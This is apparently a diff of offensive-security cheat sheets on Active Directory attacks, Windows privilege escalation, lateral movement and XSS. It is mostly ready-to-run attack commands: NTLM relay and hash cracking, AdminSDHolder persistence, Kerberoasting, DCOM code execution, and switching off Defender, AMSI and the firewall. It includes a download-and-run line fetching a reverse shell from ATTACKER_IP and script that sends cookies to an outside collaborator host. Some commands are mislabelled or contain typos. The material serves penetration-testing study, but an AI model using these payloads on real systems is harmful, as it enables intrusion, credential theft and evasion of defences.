||||
| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
|
||||
| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |
|
||||
|
||||
Crack the hash with `hashcat`.
|
||||
|
||||
```powershell
|
||||
hashcat -m 5600 -a 0 hash.txt crackstation.txt
|
||||
```
|
||||
|
||||
#### MS08-068 NTLM reflection
|
||||
|
||||
NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.
|
||||
@ -1467,7 +1471,7 @@ msf exploit(smb_relay) > show targets
|
||||
|
||||
#### SMB Signing Disabled and IPv4
|
||||
|
||||
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
|
||||
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning**
|
||||
|
||||
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
|
||||
```powershell
|
||||
@ -1584,20 +1588,22 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
|
||||
|
||||
### Dangerous Built-in Groups Usage
|
||||
|
||||
If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object "CN=AdminSDHolder,CN=System," or set "adminCount" attribute to 0 for the required object.
|
||||
If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
|
||||
|
||||
> The AdminCount attribute is set to 1 automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
|
||||
> The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
|
||||
|
||||
|
||||
Find users with `AdminCount=1`.
|
||||
|
||||
```powershell
|
||||
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
|
||||
crackmapexec ldap 10.10.10.10 -u username -p password --admin-count
|
||||
# or
|
||||
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.10.10.10
|
||||
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
|
||||
or
|
||||
# or
|
||||
Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
|
||||
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
|
||||
or
|
||||
# or
|
||||
([adsisearcher]"(AdminCount=1)").findall()
|
||||
```
|
||||
|
||||
@ -1605,19 +1611,18 @@ or
|
||||
|
||||
> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
|
||||
|
||||
If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by SDProp (in an hour).
|
||||
If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour).
|
||||
E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group.
|
||||
|
||||
```powershell
|
||||
# Add a user to the AdminSDHolder group:
|
||||
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
|
||||
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose
|
||||
|
||||
# Right to reset password for toto using the account titi
|
||||
Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword
|
||||
|
||||
# Give all rights
|
||||
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All
|
||||
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
|
||||
```
|
||||
|
||||
|
||||
@ -1634,19 +1639,42 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
|
||||
* **GenericAll on User** : We can reset user's password without knowing the current password
|
||||
* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain`
|
||||
|
||||
GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it.
|
||||
* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it.
|
||||
```powershell
|
||||
# Check for interesting permissions on accounts:
|
||||
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
|
||||
|
||||
```powershell
|
||||
# using PowerView
|
||||
# Check for interesting permissions on accounts:
|
||||
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
|
||||
# Check if current user has already an SPN setted:
|
||||
PowerView2 > Get-DomainUser -Identity <UserName> | select serviceprincipalname
|
||||
|
||||
# Check if current user has already an SPN setted:
|
||||
Get-DomainUser -Identity <UserName> | select serviceprincipalname
|
||||
# Force set the SPN on the account:
|
||||
PowerView2 > Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
|
||||
|
||||
# Grab the ticket
|
||||
PowerView2 > $User = Get-DomainUser username
|
||||
PowerView2 > $User | Get-DomainSPNTicket | fl
|
||||
PowerView2 > $User | Select serviceprincipalname
|
||||
|
||||
# Remove the SPN
|
||||
PowerView2 > Set-DomainObject -Identity username -Clear serviceprincipalname
|
||||
```
|
||||
|
||||
|
||||
* **GenericAll/GenericWrite** : We can change a victim's **userAccountControl** to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back.
|
||||
```powershell
|
||||
# Modify the userAccountControl
|
||||
PowerView2 > Get-DomainUser username | ConvertFrom-UACValue
|
||||
PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
|
||||
|
||||
# Grab the ticket
|
||||
PowerView2 > Get-DomainUser username | ConvertFrom-UACValue
|
||||
ASREPRoast > Get-ASREPHash -Domain domain.local -UserName username
|
||||
|
||||
# Set back the userAccountControl
|
||||
PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
|
||||
PowerView2 > Get-DomainUser username | ConvertFrom-UACValue
|
||||
```
|
||||
|
||||
# Force set the SPN on the account:
|
||||
Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
|
||||
```
|
||||
|
||||
#### GenericWrite
|
||||
|
||||
@ -1745,7 +1773,24 @@ Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword
|
||||
|
||||
### DCOM Exploitation
|
||||
|
||||
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer
|
||||
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
|
||||
|
||||
* CheeseTools - https://github.com/klezVirus/CheeseTools
|
||||
```powershell
|
||||
-t, --target=VALUE Target Machine
|
||||
-b, --binary=VALUE Binary: powershell.exe
|
||||
-a, --args=VALUE Arguments: -enc <blah>
|
||||
-m, --method=VALUE Methods: MMC20Application, ShellWindows,
|
||||
ShellBrowserWindow, ExcelDDE, VisioAddonEx,
|
||||
OutlookShellEx, ExcelXLL, VisioExecLine,
|
||||
OfficeMacro
|
||||
-r, --reg, --registry Enable registry manipulation
|
||||
-h, -?, --help Show Help
|
||||
|
||||
Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro.
|
||||
```
|
||||
|
||||
https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/
|
||||
|
||||
|
||||
#### DCOM via MMC Application Class
|
||||
@ -1763,7 +1808,20 @@ PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Appl
|
||||
|
||||
Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1
|
||||
|
||||
#### DCOM via Excel
|
||||
#### DCOM via Office
|
||||
|
||||
* Excel.Application
|
||||
* DDEInitiate
|
||||
* RegisterXLL
|
||||
* Outlook.Application
|
||||
* CreateObject->Shell.Application->ShellExecute
|
||||
* CreateObject->ScriptControl (office-32bit only)
|
||||
* Visio.InvisibleApp (same as Visio.Application, but should not show the Visio window)
|
||||
* Addons
|
||||
* ExecuteLine
|
||||
* Word.Application
|
||||
* RunAutoMacro
|
||||
|
||||
|
||||
```ps1
|
||||
# Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM
|
||||
@ -1774,6 +1832,17 @@ Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd
|
||||
PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
|
||||
PS C:\> $excel.DisplayAlerts = $false
|
||||
PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe")
|
||||
|
||||
# Using Excel RegisterXLL
|
||||
# Can't be used reliably with a remote target
|
||||
Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1
|
||||
PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
|
||||
PS> $excel.RegisterXLL("EvilXLL.dll")
|
||||
|
||||
# Using Visio
|
||||
$visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName"))
|
||||
$visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc")
|
||||
|
||||
```
|
||||
|
||||
#### DCOM via ShellExecute
|
||||
@ -1840,9 +1909,8 @@ domainA.local domainB.local TreeRoot Bidirectional
|
||||
Most trees are linked with dual sided trust relationships to allow for sharing of resources.
|
||||
By default the first domain created if the Forest Root.
|
||||
|
||||
Prerequisite:
|
||||
**Requirements**:
|
||||
- KRBTGT Hash
|
||||
|
||||
- Find the SID of the domain
|
||||
```powershell
|
||||
$ Convert-NameToSid target.domain.com\krbtgt
|
||||
@ -1907,7 +1975,7 @@ ls \\machine.domain.local\c$
|
||||
|
||||
The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
|
||||
|
||||
Prerequisites:
|
||||
**Requirements**:
|
||||
- Object with Property **Trust this computer for delegation to any service (Kerberos only)**
|
||||
- Must have **ADS_UF_TRUSTED_FOR_DELEGATION**
|
||||
- Must not have **ADS_UF_NOT_DELEGATED** flag
|
||||
@ -1916,20 +1984,25 @@ Prerequisites:
|
||||
|
||||
##### Find delegation
|
||||
|
||||
:warning: : Domain controllers usually have unconstrained delegation enabled.
|
||||
Check the `TrustedForDelegation` property.
|
||||
|
||||
```powershell
|
||||
# From https://github.com/samratashok/ADModule
|
||||
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
|
||||
* [ADModule](https://github.com/samratashok/ADModule)
|
||||
```powershell
|
||||
# From https://github.com/samratashok/ADModule
|
||||
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
|
||||
```
|
||||
|
||||
or
|
||||
|
||||
$> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10
|
||||
grep TRUSTED_FOR_DELEGATION domain_computers.grep
|
||||
```
|
||||
|
||||
NOTE: Domain controllers usually have unconstrained delegation enabled
|
||||
* [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
|
||||
```powershell
|
||||
$> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10
|
||||
grep TRUSTED_FOR_DELEGATION domain_computers.grep
|
||||
```
|
||||
|
||||
* [CrackMapExec module](https://github.com/byt3bl33d3r/CrackMapExec/wiki)
|
||||
```powershell
|
||||
cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation
|
||||
```
|
||||
|
||||
##### SpoolService status
|
||||
|
||||
|
@ -647,3 +647,4 @@ E
|
||||
* [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html)
|
||||
* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/)
|
||||
* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948)
|
||||
* [Anti-Analysis Techniques Used in Excel 4.0 Macros - 24 March 2021 - @Jacob_Pimental](https://www.goggleheadedhacker.com/blog/post/23)
|
@ -8,6 +8,7 @@
|
||||
* [Network Enumeration](#network-enumeration)
|
||||
* [Antivirus & Detections](#antivirus--detections)
|
||||
* [Windows Defender](#windows-defender)
|
||||
* [Firewall](#firewall)
|
||||
* [AppLocker Enumeration](#applocker-enumeration)
|
||||
* [Powershell](#powershell)
|
||||
* [Default Writeable Folders](#default-writeable-folders)
|
||||
@ -97,6 +98,11 @@
|
||||
python3 wes.py --update
|
||||
python3 wes.py systeminfo.txt
|
||||
```
|
||||
- [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck)
|
||||
```powershell
|
||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
|
||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
|
||||
```
|
||||
|
||||
## Windows Version and Configuration
|
||||
|
||||
@ -184,6 +190,14 @@ Get-LocalGroupMember Administrators | ft Name, PrincipalSource
|
||||
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
|
||||
```
|
||||
|
||||
Get Domain Controllers
|
||||
|
||||
```powershell
|
||||
nltest /DCLIST:DomainName
|
||||
nltest /DCNAME:DomainName
|
||||
nltest /DSGETDC:DomainName
|
||||
```
|
||||
|
||||
## Network Enumeration
|
||||
|
||||
List all network interfaces, IP, and DNS.
|
||||
@ -214,30 +228,6 @@ List all current connections
|
||||
netstat -ano
|
||||
```
|
||||
|
||||
List firewall state and current configuration
|
||||
|
||||
```powershell
|
||||
netsh advfirewall firewall dump
|
||||
|
||||
or
|
||||
|
||||
netsh firewall show state
|
||||
netsh firewall show config
|
||||
```
|
||||
|
||||
List firewall's blocked ports
|
||||
|
||||
```powershell
|
||||
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
|
||||
```
|
||||
|
||||
Disable firewall
|
||||
|
||||
```powershell
|
||||
netsh firewall set opmode disable
|
||||
netsh advfirewall set allprofiles state off
|
||||
```
|
||||
|
||||
List all network shares
|
||||
|
||||
```powershell
|
||||
@ -262,7 +252,7 @@ Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\Securi
|
||||
# check status of Defender
|
||||
PS C:\> Get-MpComputerStatus
|
||||
|
||||
# disable Real Time Monitoring
|
||||
# disable scanning all downloaded files and attachments, disable AMSI (reactive)
|
||||
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
||||
|
||||
@ -272,18 +262,59 @@ PS C:\> Set-MpPreference -DisableScriptScanning 1
|
||||
# exclude a folder
|
||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
|
||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
|
||||
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
||||
|
||||
# remove signatures (if Internet connection is present, they will be downloaded again):
|
||||
PS > "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
||||
```
|
||||
|
||||
### Firewall
|
||||
|
||||
List firewall state and current configuration
|
||||
|
||||
```powershell
|
||||
netsh advfirewall firewall dump
|
||||
# or
|
||||
netsh firewall show state
|
||||
netsh firewall show config
|
||||
```
|
||||
|
||||
List firewall's blocked ports
|
||||
|
||||
```powershell
|
||||
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
|
||||
```
|
||||
|
||||
Disable firewall
|
||||
|
||||
```powershell
|
||||
# Disable Firewall on Windows 7 via cmd
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
|
||||
# Disable Firewall on Windows 7 via Powershell
|
||||
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`
|
||||
|
||||
# Disable Firewall on any windows via cmd
|
||||
netsh firewall set opmode disable
|
||||
netsh Advfirewall set allprofiles state off
|
||||
```
|
||||
|
||||
|
||||
### AppLocker Enumeration
|
||||
|
||||
- With the GPO
|
||||
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
||||
|
||||
List AppLocker rules
|
||||
|
||||
```powershell
|
||||
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
```
|
||||
* List AppLocker rules
|
||||
```powershell
|
||||
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
```
|
||||
|
||||
* Applocker Bypass
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
|
||||
|
||||
### Powershell
|
||||
|
||||
@ -294,6 +325,22 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
|
||||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||||
```
|
||||
|
||||
Powershell Constrained Mode
|
||||
|
||||
```powershell
|
||||
# Check if we are in a constrained mode
|
||||
$ExecutionContext.SessionState.LanguageMode
|
||||
|
||||
PS > &{ whoami }
|
||||
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
|
||||
|
||||
# PowerShDLL - Powershell with no Powershell.exe via DLL’s
|
||||
# https://github.com/p3nt4/PowerShdll
|
||||
ftp> rundll32.exe C:\temp\PowerShdll.dll,main
|
||||
```
|
||||
|
||||
|
||||
|
||||
Example of AMSI Bypass.
|
||||
|
||||
```powershell
|
||||
@ -307,7 +354,9 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
|
||||
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
|
||||
C:\Windows\System32\spool\drivers\color
|
||||
C:\Windows\Tasks
|
||||
C:\windows\tracing
|
||||
C:\Windows\tracing
|
||||
C:\Windows\Temp
|
||||
C:\Users\Public
|
||||
```
|
||||
|
||||
## EoP - Looting for passwords
|
||||
@ -859,6 +908,7 @@ Then you can use `runas` with the `/savecred` options in order to use the saved
|
||||
The following example is calling a remote binary via an SMB share.
|
||||
```powershell
|
||||
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
|
||||
runas /savecred /user:Administrator "cmd.exe /k whoami"
|
||||
```
|
||||
|
||||
Using `runas` with a provided set of credential.
|
||||
|
@ -132,8 +132,12 @@ Require:
|
||||
```powershell
|
||||
root@payload$ git clone https://github.com/Hackplayers/evil-winrm
|
||||
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
|
||||
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
|
||||
root@payload$ ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -H BD1C6503987F8FF006296118F359FA79
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -p password -r domain.local
|
||||
|
||||
*Evil-WinRM* PS > Bypass-4MSI
|
||||
*Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1"))
|
||||
```
|
||||
|
||||
or using a custom ruby code to interact with the WinRM service.
|
||||
@ -169,6 +173,11 @@ end
|
||||
```powershell
|
||||
PS> Enable-PSRemoting
|
||||
|
||||
# use credential
|
||||
PS> $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
|
||||
PS> $cred = New-Object System.Management.Automation.PSCredential ('DOMAIN\Username', $pass)
|
||||
PS> Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
|
||||
|
||||
# one-to-one interactive session
|
||||
PS> Enter-PSSession -computerName DC01
|
||||
[DC01]: PS>
|
||||
@ -239,54 +248,49 @@ PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -
|
||||
|
||||
## RDP Remote Desktop Protocol
|
||||
|
||||
Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||
|
||||
```powershell
|
||||
PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
|
||||
```
|
||||
|
||||
Or connect remotely with `rdesktop`
|
||||
|
||||
```powershell
|
||||
root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
||||
root@payload$ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
|
||||
# -g : the screen will take up 70% of your actual screen size
|
||||
# -r disk:share : sharing a local folder during a remote desktop session
|
||||
```
|
||||
|
||||
Note: you may need to enable it with the following command
|
||||
:warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors.
|
||||
|
||||
```powershell
|
||||
# Enable RDP
|
||||
PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||
PS C:\> netsh firewall set service remoteadmin enable
|
||||
PS C:\> netsh firewall set service remotedesktop enable
|
||||
```
|
||||
|
||||
or with psexec(sysinternals)
|
||||
|
||||
```powershell
|
||||
PS C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
```
|
||||
|
||||
or with crackmapexec
|
||||
|
||||
```powershell
|
||||
# Alternative
|
||||
C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||
|
||||
# Fix CredSSP errors
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
|
||||
|
||||
# Disable NLA
|
||||
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired
|
||||
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
|
||||
```
|
||||
|
||||
or with Metasploit
|
||||
Abuse RDP protocol to execute commands remotely with the following commands;
|
||||
|
||||
```powershell
|
||||
root@payload$ run getgui -u admin -p 1234
|
||||
```
|
||||
* `rdesktop`
|
||||
```powershell
|
||||
root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
||||
root@payload$ rdesktop -u username -p password -g 70% -r disk:share=/tmp/myshare 10.10.10.10
|
||||
# -g : the screen will take up 70% of your actual screen size
|
||||
# -r disk:share : sharing a local folder during a remote desktop session
|
||||
```
|
||||
* `freerdp`
|
||||
```powershell
|
||||
root@payload$ xfreerdp /v:10.0.0.1 /u:'Username' /p:'Password123!' +clipboard /cert-ignore /size:1366x768 /smart-sizing
|
||||
root@payload$ xfreerdp /v:10.0.0.1 /u:username # password will be asked
|
||||
|
||||
or with xfreerdp
|
||||
# pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||
# pass the hash works for Server 2012 R2 / Win 8.1+
|
||||
root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d
|
||||
```
|
||||
* [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||
```powershell
|
||||
PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
|
||||
```
|
||||
|
||||
```powershell
|
||||
root@payload$ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||
root@payload$ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||
root@payload$ xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||
```
|
||||
|
||||
## Netuse
|
||||
|
||||
|
@ -90,6 +90,18 @@ fclose($fp);
|
||||
?>
|
||||
```
|
||||
|
||||
### CORS
|
||||
|
||||
```html
|
||||
<script>
|
||||
fetch('https://<SESSION>.burpcollaborator.net', {
|
||||
method: 'POST',
|
||||
mode: 'no-cors',
|
||||
body: document.cookie
|
||||
});
|
||||
</script>
|
||||
```
|
||||
|
||||
### UI redressing
|
||||
|
||||
Leverage the XSS to modify the HTML content of the page in order to display a fake login form.
|
||||
|
Loading…
Reference in New Issue
Block a user